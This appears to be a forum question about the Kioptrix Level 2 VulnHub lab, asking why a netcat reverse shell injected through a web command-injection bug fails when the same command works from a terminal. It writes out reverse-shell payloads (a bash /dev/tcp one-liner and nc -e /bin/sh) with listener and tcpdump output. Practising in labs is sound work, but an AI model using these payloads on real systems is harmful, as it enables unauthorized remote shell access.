Kioptrix 2: Why netcat reverse shell executed in web browser via command injection bug doesn’t work?


I’ve completed kioptrix level 2 challenge via bash reverse shell.

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

; bash -i >& /dev/tcp/10.10.13.37/4444 0>&1 

My question is why netcat reverse shell executed in web browser via command injection bug doesn’t work when it was working just fine via terminal?

My Setup

Kali -  10.10.13.37 Kioptrix 2 - 10.10.13.254 

netcat listerner

kali@kali:~$   nc -lp 4444 

I’ve verified tcp port 4444 is open

kali@kali:~$   ss -antp | g 4444 LISTEN 0      1            0.0.0.0:4444         0.0.0.0:*     users:(("nc",pid=3003,fd=3))  kali@kali:~$    

netcat reverse shell executed in web browser via command injection bug doesn’t work

; nc 10.10.13.37 4444 ; nc 10.10.13.37 4444 -e /bin/sh 

No traffic at all

kali@kali:~$   sudo tcpdump -nni eth0 port 4444 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 

However, when I repeat the same process with netcat executed on Kioptrix 2 terminal, I was able to get the reverse shell setup on Kali.

[backdoor@kioptrix ~]$   nc 10.10.13.37 4444 -e /bin/sh 

Reverse shell via terminal is working fine

kali@kali:~$   nc -lp 4444 id uid=502(backdoor) gid=502(backdoor) groups=0(root),10(wheel),500(john),501(harold),502(backdoor) 

tcpdump traffic, the last 4 packets were for id command

kali@kali:~$   sudo tcpdump -nni eth0 port 4444 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 00:58:29.307806 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [S], seq 1943169723, win 5840, options [mss 1460,sackOK,TS val 12217959 ecr 0,nop,wscale 2], length 0 00:58:29.307851 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [S.], seq 869624996, ack 1943169724, win 65160, options [mss 1460,sackOK,TS val 714133810 ecr 12217959,nop,wscale 7], length 0 00:58:29.308412 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 1, win 1460, options [nop,nop,TS val 12217960 ecr 714133810], length 0  00:59:55.154330 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [P.], seq 1:4, ack 1, win 510, options [nop,nop,TS val 714219657 ecr 12217960], length 3 00:59:55.157180 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 4, win 1460, options [nop,nop,TS val 12303857 ecr 714219657], length 0 00:59:55.159646 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [P.], seq 1:98, ack 4, win 1460, options [nop,nop,TS val 12303859 ecr 714219657], length 97 00:59:55.159656 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [.], ack 98, win 510, options [nop,nop,TS val 714219662 ecr 12303859], length 0